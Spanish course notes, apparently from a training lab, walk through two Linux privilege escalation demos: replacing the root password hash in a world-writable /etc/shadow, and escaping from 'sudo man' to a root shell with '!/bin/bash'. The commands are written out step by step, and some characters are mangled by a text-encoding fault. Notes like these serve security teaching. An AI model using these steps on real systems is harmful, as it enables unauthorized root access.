Linux Privilege Escalation
Weak Permissions
LinEnum: LinEnum es un script bash simple que automatiza las verificaciones de enumeraci贸n locales comunes de Linux, ademas de identificar vulnerabilidades de escalada de privilegios.
Demo: Linux Privilege Escalation Weak Permissions
student@attackdefensew$ whoami
student
student@attackdefensew$ cat /etc/passwd
student@attackdefensew$ cat /etc/group
student@attackdefensew$ group student
# El objetivo es encontrar cualquier archivo que pueda ser modificado para
# escalar privilegio
find / -not -type 1 -perm -o+w
# El archivo shadow almacena las contrase帽as
student@attackdefense:忙$ cat /etc/shadow
# Ver los permisos del archivo
student@attackdefense:忙$ ls -al /etc/shadow
-rw-rw-rw- 1 root shadow 523 Sep 23 2018 /etc/shadow
# modificamos la contrasena del root
student@attackdefense:N$ openssl passwd -1 -salt abc password
# Copiamos el valor en el usuario root en la contrasena
student@attackdefensew$ vim /etc/shadow
# Probamos la conexion
student@attackdefensew$ su
root@attackdefense:/Quiz: Weak Permissions
SUDO Privileges
Demo: Linux Privilege Escalation - SUDO Privileges
student@attackdefensew$ cat /etc/passwd
# Ver que comandos podemos ejecutar
student@attackdefense:~$ sudo -l
# El comando te puede indicar que comandos puedes ejecutar sin la contrasena de root
# pero que sea de propiedad de root
User student may run the following commands on attackdefense:
(root) NOPASSWD: /usr/bin/man
student@attackdefense:N$ sudo man ls
# Despues que se ejecute el comando puede ejecutar el siguiente comando
# debido a que cuando hace uso man, podemos utilizar una sesion bash con "!"
# Por lo cual cuando este leyendo el comando del contenido man puede usar
!/bin/bash
cd /root
ls
flagQuiz: SUDO Privileges
Last updated